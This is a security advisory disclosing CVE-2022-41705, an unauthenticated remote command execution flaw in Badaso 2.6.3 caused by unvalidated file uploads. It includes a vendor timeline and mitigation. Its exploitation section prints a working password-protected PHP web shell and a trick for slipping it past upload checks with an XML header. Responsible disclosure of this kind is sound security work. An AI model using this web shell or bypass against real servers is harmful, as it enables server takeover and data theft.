Badaso 2.6.3 - Remote Command Execution
Summary
Name | Badaso 2.6.3 - RCE |
Code name | |
Product | Badaso |
Affected versions | Version 2.6.3 |
State | Public |
Release date | 2022-11-16 |
Vulnerability
Kind | Remote command execution |
Rule | |
Remote | Yes |
CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
CVSSv3.1 Base Score | 10.0 |
Exploit available | Yes |
CVE ID(s) |
Description
Badaso version 2.6.3 allows an unauthenticated remote attacker to execute arbitrary code remotely on the server. This is possible because the application does not properly validate the data uploaded by users.
Vulnerability
This vulnerability occurs because the application does not correctly validate files uploaded by users. Thanks to this, we uploaded a file with malicious PHP code, instead of an image file.
Exploitation
To exploit this vulnerability, the following file must be sent to the server:
exploit.php
<?xml version="1.0" standalone="no"?> <?php if($_POST && $_POST['password']==="AGSH635479302H235") { echo system($_POST['cmd']); } ?>
It is important to put an XML header before the malicious code to bypass security controls.
Evidence of exploitation
Our security policy
We have reserved the CVE-2022-41705 to refer to this issue from now on.
System Information
-
Version: Badaso 2.6.3
-
Operating System: GNU/Linux
Mitigation
An updated version of Badaso is available at the vendor page.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/uasoft-indonesia/badaso
Issue https://github.com/uasoft-indonesia/badaso/issues/818
Timeline
2022-10-24
Vulnerability discovered.
2022-10-24
Vendor contacted.
2022-10-24
Vendor replied acknowledging the report.
2022-10-26
Vendor Confirmed the vulnerability.
2022-11-15
Vulnerability patched.
2022-11-16
Public Disclosure.